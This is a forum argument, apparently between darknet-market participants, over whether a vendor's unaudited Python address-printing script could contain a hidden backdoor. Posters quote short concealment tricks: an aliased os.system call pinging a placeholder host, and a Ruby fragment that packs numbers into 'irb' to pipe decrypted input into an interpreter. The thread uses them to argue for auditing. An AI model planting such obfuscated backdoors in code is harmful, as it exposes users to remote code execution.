Quote from: kmfkewm on September 09, 2012, 06:04 amQuoteinserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python.Yep, I've demonstrated this a couple of times already. It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).Quote from: kmfkewm on September 09, 2012, 06:04 amhaving `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code. Okay, but calling the function necessary to invoke it is rather obvious. Locating that is just a matter of grepping for os.system.Now I could conceal that a little with something like:Code: [Select]import oss = os.systemBut then it would still be clear that s("ping supersecretlebase.example.com") is a system call.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* No encrypted data is shipped with my code.But it gets encrypted data input from random customersYeah, when I wrote that I didn't get what your code was actually doing.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* There is a copy of my GPG key currently. I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case. I've removed the key from the current dev branch for two reasons: to remove the possibility of hiding something in there and in case a user runs everything from the extracted directory instead of copying the specified files to a temp directory.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* There is no such exploit in my code.Possibly not. Probably not even!Well, Pine has finally returned to the thread and she doesn't share your confidence in the probabilities.Quote from: kmfkewm on September 09, 2012, 06:04 amBut nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where peoples claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave. Well, you're one ahead of me. I don't have any experience planting backdoors in code.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* Such an exploit would be able to be spotted.Indeed by anyone who know the language well enough to A. Know what back ticks doB. Know what pack and unpack doC. Know what | does on a terminal D. Know what irb isE. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thingSuch an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command. Given the nature of os.system and struct in Python, I'd be surprised if it could be concealed as well as it can in Ruby. I could be wrong there, but I don't think so.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).Neither does the example code I showed, it gets the networking require from the decrypted ciphertext. It still needs network access, though.Quote from: kmfkewm on September 09, 2012, 06:04 amQuote* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it). This would pretty effectively stop an exploit checking address data from being used in a live system.You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address. Fair point.Quote from: kmfkewm on September 09, 2012, 06:04 amQuoteSo, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement. It's one thing to to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes. Which brings us back to proving it, which we've been round and round on. Your comment there wasn't merely pointing out what might be, it became an accusation at that point.Quote from: kmfkewm on September 09, 2012, 06:04 amQuoteYou, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.Axtually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:Quote from: kmfkewm on September 08, 2012, 01:27 pmQuote from: Limetless on September 08, 2012, 01:23 pmAnd how does this relate to the person being accused.....it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize | #{[105, 114, 98].pack("c*")} is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.That is a fallacious argument, the only purpose of which being to use in an ad hominem attack.